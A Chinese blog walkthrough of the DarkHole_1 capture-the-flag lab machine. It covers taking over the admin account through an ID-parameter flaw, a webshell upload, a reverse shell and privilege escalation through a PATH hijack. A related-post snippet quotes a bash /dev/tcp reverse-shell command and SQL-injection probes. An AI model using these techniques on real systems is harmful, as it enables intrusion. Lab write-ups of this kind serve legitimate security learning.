Darkhole_1打靶练习

最新推荐文章于 2024-06-03 13:31:43 发布
最新推荐文章于 2024-06-03 13:31:43 发布
阅读量101 收藏
点赞数
文章标签: python vim docker idea
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76909375/article/details/131747956
版权

Darkhole_1打靶练习

使用nmap扫描

靶机IP为192.168.31.142

开启端口为:22、80

访问80端口,右上角有一个login

点击进入是一个登录页面

在靶机的提示中,不考虑爆破,所以我们直接点击sign up now(现在去注册)

我们进行注册登录

看网址经典的id=2,输入单引号看看存不存在SQL注入

显示你不允许访问用户信息,抓包尝试是否存在越权漏洞

将id=2改为id=1

密码修改成功,存在越权漏洞

我们用admin/111的密码尝试登录,登录成功

有文件上传点,直接上传木马

PHP后缀上传失败那就换个phtml

上传成功

打开msfconsole,并设置参数

输入run开启监听

浏览器上访问刚刚上传的木马

Kali成功反弹shell

输入python3 -c ‘import pty;pty.spawn(“/bin/bash”)’让shell成为交互式

输入cat /etc/passwd查看账号

经过一番搜索,在john的家目录发现一个叫toto的文件,具有SUID权限,其作用是输出id

我们可以尝试修改环境变量,使得他执行命令的时候带出john的bash

拿到第一个flag(john有执行file.py的权限)

查看一下password,拿到john账户的密码

拿到了john的密码且有SSH服务,我们尝试使用SSH连接

连接成功

来到home,修改file.py的内容

运行file.py文件,获得root权限

获得root权限

拿到第二个flag

正在学渗透的菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
shoot.zip_MATLAB打靶法_matlab打靶_二阶非线性常微分方程求解_打靶法_非线性 打靶
07-15
试用打靶法求二阶非线性常微分方程两点边值的数值解,用Matlab编程计算,并给出一些例子,验证你的算法与程序的正确性。
shooting.rar_MATLAB打靶法_matlab 打靶法_shooting method_shooting matl
07-14
shooting 打靶法,MATLAB编程,仅供参考。
DarkHole_2打靶记录
wwd180的博客
06-14 166
实验主机:攻击机kali 靶机DarkHole实验目标:取得 root 权限 + 2 Flag实验网络:桥接模式。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3103
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 945
VulnHub-DarkHole: 2靶机详细渗透过程
darkhole_2靶机打靶过程及思路
qq_52610024的博客
06-25 567
6.使用3493进行提权失败,查看账号目录下的.bash_history,提示发现命令执行,且提示开放了9999。7.发现该账号的命令执行历史记录下提示存在该账号存在sudo权限,输入history记录下的密码,成功执行。4.发现后台页面url地址上有id=1,推测存在sql注入,手工进行union联合注入,得到账号密码。再次查看login.php,里面存在默认用户名和密码,回到首页登录成功,成功进入后台。,访问该路径,成功执行命令,执行反弹语句,成功拿到losy账号权限。成功得到root账号的权限。...
money_box打靶练习
weixin_43937492的博客
05-23 250
moneybox靶机靶场,打靶一下
每周打靶-DarkHole系列靶机实-DarkHole_2
m0_54178755的博客
09-23 151
每周打靶-DarkHole系列靶机实-DarkHole_2
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 457
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
vuluhub-darkhole2 打靶记录
lcc001114的博客
06-14 150
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
DarkHole1打靶记录
wwd180的博客
06-15 86
实验主机:攻击机kali(192.168.109.131)靶机DarkHole(192.168.109.132)实验目标:获取root权限 + flag实验网络:NAT。
lsq.rar_LSQ wireless_boundary problem_shooting method_打靶_打靶
09-19
打靶法求微分方程边值问题,这是数学上的求取方程问题的边值的方法
daodan.rar_daodan_missile_蒙特卡洛导弹_蒙特卡洛打靶_蒙特卡洛试验
09-24
基于c++的运用蒙特卡洛法导弹打靶试验仿真代码
Shootmethod.zip_shooting_打靶法_方程
07-14
打靶法解算微分方程,该方程可以解算再一直终点状态的情况下解算微分方程
如何mysql数据导入到mongdb
codemami的博客
05-30 1393
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
在linux服务器上使用tensorboard,错误记录
wwwwzm的博客
05-30 1118
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
基于NANO 9K 开发板加载PICORV32软核,并建立交叉编译环境
pocean2012的博客
05-30 1153
ISP的实现逻辑是出厂“芯片”(我们这里是软核)自带了BootLoader程序,即出厂引导程序,通过BootLoader可以将程序从串口(上位机)下载到Flash中,实际的时序是通过RST来区分正常启动还是烧录状态,然后上位机的烧录脚本来控制串口时序, 用户程序实际上是通过串口最终下载到了FLASH中,然后程序从flash启动。NANO 9K低成本体验FPGA开发,还是挺香的,官方例子有加载PICORV32软核的例子,可以建立简单的ISP编程环境,通过串口就可以加载程序,很方便。
Python热重载调试新利器
最新发布
weixin_53707653的博客
06-03 315
Reloading是一个Python工具库,它让我们可以在每次迭代之前从源代码中重新加载(或函数)而不丢失任何当前已执行过程。该工具对于在深度学习模型训练期间编辑源代码尤其好用,它让我们可以添加日志记录、打印统计数据或保存模型,而无需重新启动训练。
蒙特卡洛打靶matlab
05-12
蒙特卡洛打靶是一种常用的数值模拟方法,可以用来估计某个过程的概率分布或期望值。在打靶问题中,我们需要估计一个枪手打中靶心的概率。 下面是使用 Matlab 实现蒙特卡洛打靶的代码示例: ```matlab % 定义打靶...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值